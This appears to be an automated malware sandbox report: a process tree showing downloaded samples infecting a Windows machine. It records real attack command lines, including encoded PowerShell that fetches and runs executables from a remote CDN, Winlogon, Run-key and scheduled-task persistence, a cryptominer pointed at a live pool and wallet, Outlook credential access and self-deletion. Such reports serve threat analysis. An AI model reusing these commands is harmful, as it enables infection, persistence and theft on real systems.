Regsvcs.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Regsvcs.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://urlhaus.abuse.ch/browse/tag/exe/2⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://urlhaus.abuse.ch/browse/tag/exe/3⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4860.0.1468251664\1171872532" -parentBuildID 20200403170909 -prefsHandle 1700 -prefMapHandle 1692 -prefsLen 1 -prefMapSize 220117 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4860 "\\.\pipe\gecko-crash-server-pipe.4860" 1800 gpu4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4860.3.1562552367\1024374703" -childID 1 -isForBrowser -prefsHandle 2260 -prefMapHandle 2348 -prefsLen 112 -prefMapSize 220117 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4860 "\\.\pipe\gecko-crash-server-pipe.4860" 2436 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4860.13.1139717051\1641661172" -childID 2 -isForBrowser -prefsHandle 3588 -prefMapHandle 3596 -prefsLen 6894 -prefMapSize 220117 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4860 "\\.\pipe\gecko-crash-server-pipe.4860" 3688 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4860.20.386769839\507367898" -parentBuildID 20200403170909 -prefsHandle 6300 -prefMapHandle 10064 -prefsLen 10101 -prefMapSize 220117 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4860 "\\.\pipe\gecko-crash-server-pipe.4860" 9840 rdd4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4860.21.1534526808\1804290922" -parentBuildID 20200403170909 -prefsHandle 9780 -prefMapHandle 9784 -prefsLen 10101 -prefMapSize 220117 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4860 "\\.\pipe\gecko-crash-server-pipe.4860" 9792 rdd4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4860.25.1607080939\996058646" -childID 3 -isForBrowser -prefsHandle 908 -prefMapHandle 10024 -prefsLen 10318 -prefMapSize 220117 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4860 "\\.\pipe\gecko-crash-server-pipe.4860" 9152 tab4⤵
-
C:\Program Files\Mozilla Firefox\crashreporter.exe"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vybwayxr.default-release\minidumps\49a81c05-d170-477b-b965-4e97256b0525.dmp"4⤵
- Modifies registry class
-
C:\Program Files\Mozilla Firefox\minidump-analyzer.exe"C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vybwayxr.default-release\minidumps\49a81c05-d170-477b-b965-4e97256b0525.dmp"5⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://urlhaus.abuse.ch/browse/tag/exe/"5⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://urlhaus.abuse.ch/browse/tag/exe/6⤵
- Checks processor information in registry
-
C:\Users\Admin\Downloads\alaat2.1.exe"C:\Users\Admin\Downloads\alaat2.1.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ycayuhnew.exe"C:\Users\Admin\AppData\Local\Temp\ycayuhnew.exe" C:\Users\Admin\AppData\Local\Temp\rjyyjwcs.j3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\ycayuhnew.exe"C:\Users\Admin\AppData\Local\Temp\ycayuhnew.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\SysWOW64\cmstp.exe"2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\ycayuhnew.exe"3⤵
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵
-
C:\Users\Admin\Downloads\makanaki.exe"C:\Users\Admin\Downloads\makanaki.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\zgoqp.exe"C:\Users\Admin\AppData\Local\Temp\zgoqp.exe" C:\Users\Admin\AppData\Local\Temp\beujeu.oxz3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\zgoqp.exe"C:\Users\Admin\AppData\Local\Temp\zgoqp.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Downloads\vbc.exe"C:\Users\Admin\Downloads\vbc.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 38 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe,"3⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 384⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe,"4⤵
- Modifies WinLogon for persistence
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 37 > nul && copy "C:\Users\Admin\Downloads\vbc.exe" "C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe" && ping 127.0.0.1 -n 37 > nul && "C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe"3⤵
- NTFS ADS
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 374⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 374⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe"C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\auyghobjypbaufjnxqsmc"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\auyghobjypbaufjnxqsmc"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\lwdzahmlmxtnwtgrgbfgnuzv"6⤵
- Accesses Microsoft Outlook accounts
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\vqikazxeiflshzuvqmshqhuenzv"6⤵
-
C:\Users\Admin\Downloads\build.exe"C:\Users\Admin\Downloads\build.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Downloads\build.exe" & exit3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Downloads\jeymo2.1.exe"C:\Users\Admin\Downloads\jeymo2.1.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\enqnjvfa.exe"C:\Users\Admin\AppData\Local\Temp\enqnjvfa.exe" C:\Users\Admin\AppData\Local\Temp\xofvp.izm3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\enqnjvfa.exe"C:\Users\Admin\AppData\Local\Temp\enqnjvfa.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmmon32.exe"C:\Windows\SysWOW64\cmmon32.exe"2⤵
- Adds policy Run key to start application
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\enqnjvfa.exe"3⤵
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵
-
C:\Users\Admin\Downloads\vbc(1).exe"C:\Users\Admin\Downloads\vbc(1).exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 47 > nul && copy "C:\Users\Admin\Downloads\vbc(1).exe" "C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe" && ping 127.0.0.1 -n 47 > nul && "C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe"3⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 474⤵
- Runs ping.exe
-
C:\Users\Admin\Downloads\vbc(2).exe"C:\Users\Admin\Downloads\vbc(2).exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- NTFS ADS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==3⤵
-
C:\Users\Admin\Downloads\vbc(2).exeC:\Users\Admin\Downloads\vbc(2).exe3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\Downloads\newversion2.exe"C:\Users\Admin\Downloads\newversion2.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- NTFS ADS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANQAwAA==3⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe3⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 146.190.62.166:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ.Worker_CPU -p x --algo rx/0 --cpu-max-threads-hint=504⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 146.190.62.166:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ.Worker_CPU -p x --algo rx/0 --cpu-max-threads-hint=504⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 146.190.62.166:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ.Worker_CPU -p x --algo rx/0 --cpu-max-threads-hint=504⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 146.190.62.166:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ.Worker_CPU -p x --algo rx/0 --cpu-max-threads-hint=504⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\wlanext.exe"C:\Windows\SysWOW64\wlanext.exe"3⤵
- Modifies Internet Explorer settings
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"4⤵
-
C:\Users\Admin\Downloads\RustExternal%u202Enls..scr"C:\Users\Admin\Downloads\RustExternal%u202Enls..scr" /S2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd3⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE"C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE"4⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\0.exeC:\Users\Admin\AppData\Local\Temp\0.exe6⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\uQIyezHYEb.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\uQIyezHYEb.exeC:\Users\Admin\AppData\Local\Temp\uQIyezHYEb.exe8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZABrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADAAMQAyADIAMwA2ADkAMAAzADQAMQAvAHAAbABsAG0AbQBkAGkAaQBwAG0ALgBlAHgAZQAnACwAIAA8ACMAeABjAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwByAGoAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAGYAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBKAEQAUwBHADMALgBlAHgAZQAnACkAKQA8ACMAZwByAHkAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZgB1AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAcABiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEoARABTAEcAMwAuAGUAeABlACcAKQA8ACMAdwBrAGsAIwA+AA=="9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\JDSG3.exe"C:\Users\Admin\AppData\Roaming\JDSG3.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"11⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\sSHdLPmGvR.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\sSHdLPmGvR.exeC:\Users\Admin\AppData\Local\Temp\sSHdLPmGvR.exe8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAawBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADEANAAwADEANgAzADEANwA1ADEAMwAvAEMAUgAuAGUAeABlACcALAAgADwAIwBnAHcAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHgAZQBsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAZABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEoARABTAEcANAAuAGUAeABlACcAKQApADwAIwBuAHEAZgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHgAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABqAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASgBEAFMARwA0AC4AZQB4AGUAJwApADwAIwB5AHUAZQAjAD4A"9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\JDSG4.exe"C:\Users\Admin\AppData\Roaming\JDSG4.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'11⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f12⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd11⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\gWp3Y1Z5zl.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\gWp3Y1Z5zl.exeC:\Users\Admin\AppData\Local\Temp\gWp3Y1Z5zl.exe8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZQBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADQANAA5ADQAMAA5ADMAMwAxADUAMAAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAdQBhAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAG4AagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAHAAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBKAEQAUwBEAFMANAAuAGUAeABlACcAKQApADwAIwB3AHAAeAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAG4AawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBkAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASgBEAFMARABTADQALgBlAHgAZQAnACkAPAAjAGUAYgBoACMAPgA="9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exe"C:\Users\Admin\AppData\Roaming\JDSDS4.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"11⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\MsLpqg1mkp.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\MsLpqg1mkp.exeC:\Users\Admin\AppData\Local\Temp\MsLpqg1mkp.exe8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAYwBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADUANAAzADMANgAxADcANAAxADYAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGoAdABqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBrAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYQBrAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABPAFMAQQAxADIALgBlAHgAZQAnACkAKQA8ACMAZABoAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwByAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGsAbABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATwBTAEEAMQAyAC4AZQB4AGUAJwApADwAIwB1AG4AcQAjAD4A"9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\POSA12.exe"C:\Users\Admin\AppData\Roaming\POSA12.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'11⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f12⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd11⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd11⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\35JrmltklD.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\35JrmltklD.exeC:\Users\Admin\AppData\Local\Temp\35JrmltklD.exe8⤵
- Executes dropped EXE
- Checks computer location settings
-
